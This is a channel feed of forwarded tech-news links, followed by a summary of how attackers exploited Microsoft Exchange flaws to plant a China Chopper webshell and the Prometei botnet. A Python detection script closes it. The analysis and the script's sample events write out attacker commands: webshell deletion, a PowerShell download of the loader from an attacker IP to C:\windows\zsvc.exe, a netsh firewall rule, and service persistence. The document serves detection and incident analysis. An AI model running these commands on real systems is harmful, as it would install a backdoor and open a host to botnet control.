Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
UNDERCODE NEWS
A Year of Gemini: A Pop Quiz - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
📱 A Courageous Leap: Engineer Quits High-Paying Job for Happiness and Impact
https://undercodenews.com/a-courageous-leap-engineer-quits-high-paying-job-for-happiness-and-impact/
@Undercode_News
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Italy Gets Its #Digital ID Wallet: Convenience or Privacy Trap?
https://undercodenews.com/italy-gets-its-digital-id-wallet-convenience-or-privacy-trap/
@Undercode_News
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🛡️ #GitHub Enterprise Cloud Earns SOC 2 Type II Compliance, Boosting Security for Developers
https://undercodenews.com/github-enterprise-cloud-earns-soc-2-type-ii-compliance-boosting-security-for-developers/
@Undercode_News
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🔍 Empowering the Next Generation of Computing Researchers
https://undercodenews.com/empowering-the-next-generation-of-computing-researchers/
@Undercode_News
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
#Google's #AI Tackles Traffic Congestion and Fuel Emissions
https://undercodenews.com/googles-ai-tackles-traffic-congestion-and-fuel-emissions/
@Undercode_News
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🔧 A Sleek Solution: Orico's MiniMate for Your M4 Mac mini
https://undercodenews.com/a-sleek-solution-oricos-minimate-for-your-m4-mac-mini/
@Undercode_News
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
📱 #Apple's M4 Mac Mini: A Powerful Little Package
https://undercodenews.com/apples-m4-mac-mini-a-powerful-little-package/
@Undercode_News
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🌐 #Firefox 133: A Leap Forward in Web Browsing
https://undercodenews.com/firefox-133-a-leap-forward-in-web-browsing/
@Undercode_News
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
⚡️ #GitHub Strengthens Security Posture with New SOC 2 Reports for Enterprise Cloud, #Copilot, and More
https://undercodenews.com/github-strengthens-security-posture-with-new-soc-2-reports-for-enterprise-cloud-copilot-and-more/
@Undercode_News
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
#GitHub Actions: A Deeper Dive into Runner Labels
https://undercodenews.com/github-actions-a-deeper-dive-into-runner-labels/
@Undercode_News
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
📱 #Microsoft Expands #Windows Recall #AI Feature: A Measured Approach
https://undercodenews.com/microsoft-expands-windows-recall-ai-feature-a-measured-approach/
@Undercode_News
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
💻 Evernote: A #Digital Notebook for Your Thoughts
https://undercodenews.com/evernote-a-digital-notebook-for-your-thoughts/
@Undercode_News
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Informative The Rise of VK: A Social Media Giant in Russia and Beyond
https://undercodenews.com/informative-the-rise-of-vk-a-social-media-giant-in-russia-and-beyond/
@Undercode_News
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🤖 Informative Navigating Tumblr's Login Process: A Step-by-Step Guide
https://undercodenews.com/informative-navigating-tumblrs-login-process-a-step-by-step-guide/
@Undercode_News
🦑Exploitation of the Microsoft Exchange Vulnerability:
During the IR investigation, the Nocturnus Team identified the initial compromise vector: the attackers exploited the recently disclosed Microsoft Exchange Server vulnerabilities CVE-2021-27065 and CVE-2021-26858 to gain remote code execution on the server.
The attackers used this access to install and execute the China Chopper webshell via the following commands:
Once the attackers gained access to the network, they deleted the .aspx webshell file to cover their tracks:
cmd.exe /c del "C:\Program Files\Microsoft\Exchange Server\V15\\frontend\httpproxy\owa\auth\<file_name>.aspx"
Using the webshell, the attackers launched PowerShell, which was then used to download a payload from the following URL:
http://178.21.164[.]68/dwn.php?b64=1&d=nethost64C.exe&B=_AMD64,<machine_name>
The payload is then saved as C:\windows\zsvc.exe and executed. This is the start of the Prometei botnet execution:
The Prometei Botnet:
When the first module of the botnet, zsvc.exe, is executed, it starts to “prepare the ground” for the other modules:
It copies itself into C:\Windows with the name “sqhost.exe”
It uses Netsh commands to add a firewall rule that will allow sqhost.exe to create connections over HTTP
It checks if there is a registry key named “UPlugPlay”, and if present it deletes it
It sets a registry key for persistence as HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay with the image path and command line c:\windows\sqhost.exe Dcomsvc
It creates several registry keys under SOFTWARE\Microsoft\Fax\ and SOFTWARE\Intel\support\ with the names MachineKeyId, EncryptedMachineKeyId and CommId, for later use by the different components for C2 communication.
Sqhost.exe:
Sqhost.exe is the main bot module, complete with backdoor capabilities that support a wide range of commands. Sqhost.exe is able to parse the prometei.cgi file from 4 different hardcoded command and control servers. The file contains the command to be executed on the machine. The commands can be used as “stand-alone” native OS commands (cmd commands, WMI, etc.) or can be used to interact with the other modules of the malware located under C:\Windows\dell
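The chain above (webshell cleanup under owa\auth, PowerShell download from dwn.php, zsvc.exe drop, netsh firewall rule for sqhost.exe, UPlugPlay service running sqhost.exe Dcomsvc) maps cleanly onto process-creation telemetry. The Python script below is an added example, not code from the Cybereason report or from this channel: it runs one rule set per stage over constructed Sysmon-style events and reports, per host, which stages were seen. The sample events, the exact PowerShell download command, the netsh rule text, and the parent processes (w3wp.exe for webshell-spawned commands, services.exe for the service start) are assumptions; the post gives only the URL, the file paths, the service name and the rule's effect.

```python
"""Stage-based detection for the Prometei intrusion chain (added example).

SAMPLE_EVENTS are constructed for this example, not taken from the report.
Each is a simplified Sysmon Event ID 1 record. The PowerShell download
syntax, the netsh rule text and the parent processes are assumptions.
"""
import re
from collections import defaultdict

SAMPLE_EVENTS = [
    {"host": "exch01",  # webshell cleanup: IIS worker process spawns cmd to delete the .aspx
     "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c del "C:\Program Files\Microsoft\Exchange Server\V15\frontend\httpproxy\owa\auth\a1b2.aspx"'},
    {"host": "exch01",  # loader download (assumed command form) via PowerShell from the webshell
     "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://178.21.164.68/dwn.php?b64=1&d=nethost64C.exe&B=_AMD64,EXCH01','C:\windows\zsvc.exe')"},
    {"host": "exch01",  # loader execution
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\windows\zsvc.exe",
     "cmdline": r"C:\windows\zsvc.exe"},
    {"host": "exch01",  # firewall rule for sqhost.exe (assumed netsh syntax)
     "parent": r"C:\windows\zsvc.exe",
     "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": r'netsh advfirewall firewall add rule name="Windows Host" dir=out action=allow protocol=TCP remoteport=80 program="C:\Windows\sqhost.exe"'},
    {"host": "exch01",  # UPlugPlay service start: services.exe runs sqhost.exe Dcomsvc
     "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\windows\sqhost.exe",
     "cmdline": r"c:\windows\sqhost.exe Dcomsvc"},
    {"host": "exch01",  # benign noise: an ordinary deletion must not fire the webshell rule
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c del "C:\Users\admin\tmp\old.log"'},
]

# One rule set per stage; every listed field must match (case-insensitive).
STAGES = {
    "webshell_cleanup": {
        "parent": r"\\w3wp\.exe$",
        "image": r"\\cmd\.exe$",
        "cmdline": r"\bdel\b.*\\frontend\\httpproxy\\owa\\auth\\[^\"\\]+\.aspx",
    },
    "payload_download": {
        "image": r"\\powershell\.exe$",
        "cmdline": r"/dwn\.php\?[^\s'\"]*\bb64=1\b",
    },
    "loader_exec": {"image": r"\\zsvc\.exe$"},
    "firewall_rule": {
        "image": r"\\netsh\.exe$",
        "cmdline": r"advfirewall\s+firewall\s+add\s+rule\b.*\\sqhost\.exe",
    },
    "service_persistence": {
        "parent": r"\\services\.exe$",
        "image": r"\\sqhost\.exe$",
        "cmdline": r"\bDcomsvc\b",
    },
}

# Download host from the post, kept defanged in source and refanged only for matching.
KNOWN_DOWNLOAD_HOSTS = {"178.21.164[.]68"}


def refang(indicator):
    """Turn a defanged indicator ('1.2.3[.]4') back into its matchable form."""
    return indicator.replace("[.]", ".")


def match_stage(event, rules):
    """True when every field named in the rule set matches its regex."""
    return all(re.search(pat, event.get(field, ""), re.IGNORECASE)
               for field, pat in rules.items())


def scan(events):
    """Return one finding per (event, stage) hit plus known-host hits on the command line."""
    findings = []
    for ev in events:
        for stage, rules in STAGES.items():
            if match_stage(ev, rules):
                findings.append({"host": ev["host"], "stage": stage, "cmdline": ev["cmdline"]})
        if any(refang(h) in ev.get("cmdline", "") for h in KNOWN_DOWNLOAD_HOSTS):
            findings.append({"host": ev["host"], "stage": "known_c2_host", "cmdline": ev["cmdline"]})
    return findings


def verdict(findings, min_stages=3):
    """Per host: (chain_confirmed, sorted stages seen); confirmed when >= min_stages distinct stages."""
    by_host = defaultdict(set)
    for f in findings:
        by_host[f["host"]].add(f["stage"])
    return {h: (len(s) >= min_stages, sorted(s)) for h, s in by_host.items()}


if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f['host']}: {f['stage']:20} {f['cmdline'][:80]}")
    print(verdict(hits))
```

The stage rules deliberately key on behaviour rather than on the file names alone: a deletion of any .aspx under the OWA auth directory by a w3wp.exe child, a dwn.php fetch with b64=1 regardless of IP, and a service-started binary carrying the Dcomsvc argument. Requiring several distinct stages per host before calling the chain confirmed keeps one-off matches (a legitimate netsh rule, for instance) from raising an alert on their own.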